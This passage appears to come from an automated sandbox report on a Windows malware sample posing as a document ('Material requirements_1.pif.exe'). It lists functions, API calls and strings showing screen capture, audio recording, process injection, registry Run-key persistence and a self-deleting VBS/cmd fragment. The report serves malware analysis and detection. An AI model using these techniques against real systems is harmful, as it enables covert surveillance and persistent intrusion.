                        • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                        • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                        • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                        Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                        • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                        Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                        • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                        • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                        • Instruction Fuzzy Hash:
                        Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                        Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                          • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                        • DeleteDC.GDI32(?), ref: 0041806D
                        • DeleteDC.GDI32(00000000), ref: 00418070
                        • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                        • GetIconInfo.USER32(?,?), ref: 004180DB
                        • DeleteObject.GDI32(?), ref: 0041810A
                        • DeleteObject.GDI32(?), ref: 00418117
                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                        • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                        • DeleteDC.GDI32(?), ref: 0041828F
                        • DeleteDC.GDI32(00000000), ref: 00418292
                        • DeleteObject.GDI32(00000000), ref: 00418295
                        • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                        • DeleteObject.GDI32(00000000), ref: 00418354
                        • GlobalFree.KERNEL32(?), ref: 0041835B
                        • DeleteDC.GDI32(?), ref: 0041836B
                        • DeleteDC.GDI32(00000000), ref: 00418376
                        • DeleteDC.GDI32(?), ref: 004183A8
                        • DeleteDC.GDI32(00000000), ref: 004183AB
                        • DeleteObject.GDI32(?), ref: 004183B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                        • String ID: DISPLAY
                        • API String ID: 1765752176-865373369
                        • Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                        • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                        • Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                        • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                        Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                        • ResumeThread.KERNEL32(?), ref: 00417582
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                        • GetLastError.KERNEL32 ref: 004175C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                        • API String ID: 4188446516-3035715614
                        • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                        • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                        • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                        • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                        Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                        • ExitProcess.KERNEL32 ref: 0041151D
                          • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                          • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                          • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                          • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                          • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                          • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                          • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                        • API String ID: 4250697656-2665858469
                        • Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                        • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                        • Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                        • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                        Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                        • ExitProcess.KERNEL32 ref: 0040C63E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                        • API String ID: 1861856835-3168347843
                        • Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                        • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                        • Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                        • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                        Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                        • ExitProcess.KERNEL32 ref: 0040C287
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                        • API String ID: 3797177996-1998216422
                        • Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                        • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                        • Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                        • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                        Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                        • SetEvent.KERNEL32 ref: 0041A39A
                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                        • CloseHandle.KERNEL32 ref: 0041A3BB
                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                        • API String ID: 738084811-1408154895
                        • Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                        • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                        • Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                        • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                        Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                        • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                        • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                        • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Create
                        • String ID: RIFF$WAVE$data$fmt
                        • API String ID: 1602526932-4212202414
                        • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                        • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                        • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                        • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                        Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000001,004068B2,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                        • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                        • GetProcAddress.KERNEL32(00000000), ref: 00406511
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                        • GetProcAddress.KERNEL32(00000000), ref: 00406525
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                        • GetProcAddress.KERNEL32(00000000), ref: 00406539
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                        • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                        • GetProcAddress.KERNEL32(00000000), ref: 00406561
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                        • API String ID: 1646373207-1655276172
                        • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                        • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                        • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                        • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                        Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 0040BC75
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Material requirements_1.pif.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                        • _wcslen.LIBCMT ref: 0040BD54
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Material requirements_1.pif.exe,00000000,00000000), ref: 0040BDF2
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                        • _wcslen.LIBCMT ref: 0040BE34
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                        • ExitProcess.KERNEL32 ref: 0040BED0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                        • String ID: 6$C:\Users\user\Desktop\Material requirements_1.pif.exe$del$open$BG$BG
                        • API String ID: 1579085052-3202080899
                        • Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                        • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                        • Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                        • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                        Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?), ref: 0041B1E6
                        • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                        • lstrlenW.KERNEL32(?), ref: 0041B217
                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                        • _wcslen.LIBCMT ref: 0041B2EB
                        • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                        • GetLastError.KERNEL32 ref: 0041B323
                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                        • lstrcatW.KERNEL32(?,?), ref: 0041B369
                        • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                        • GetLastError.KERNEL32 ref: 0041B380
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
